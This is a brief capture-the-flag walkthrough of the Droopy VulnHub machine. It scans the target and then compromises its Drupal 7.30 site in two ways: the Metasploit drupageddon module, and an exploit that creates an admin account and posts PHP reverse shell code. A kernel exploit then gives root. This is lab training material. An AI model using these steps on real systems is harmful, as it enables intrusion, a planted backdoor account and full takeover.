Droopy:V0.2

Tools:

  • netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Metasploit
  • droopescan

Vulnerabilities:

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.41.0/24

192.168.41.155 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.41.155 -p-

Only port 80 is opening.

use nikto to scan

nikto -h 192.168.41.155

No useful info come out.

1

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.155/FUZZ 2>/dev/null

still same thing.

check the http://192.168.41.155

Find the target use Drupal

Use Metasploit

in msfconsole, search drupal, find an interesting exploit exploit/multi/http/drupal_drupageddon

1
2
3

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > set rhost 192.168.41.155
msf exploit(drupal_drupageddon) > exploit

get meterpreter, do command shell to get shell.

use python -c 'import pty; pty.spawn("/bin/bash")' get bash

user is www-data, next try to get root

uname -a

Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

the kernel is 3.1.30

searchsploit 3.1.30

upload the exploit, compile and run it, get the root:

Another way

use droopescan to scan

droopescan scan drupal -u http://192.168.41.155/ -t 8

now I know the version is 7.30

searchsploit drupal

find the 34992.txt exploit works.

./34992.py -t http://192.168.41.155 -u test -p test

this exploit creates an admin account test/test, then in Modules, make sure the PHP filter is selected.

Also in People -> Permissions, check Use the PHP code text format

In configuration -> Content authoring -> Text formats, need to check administrator box.

Then create a new content (copy and paste reverse shell php code) and use PhP Code in the format, save it, then netcat will get the shell.

Then use same method in the first part of this post to get the root.

DONE

drupal, vulhub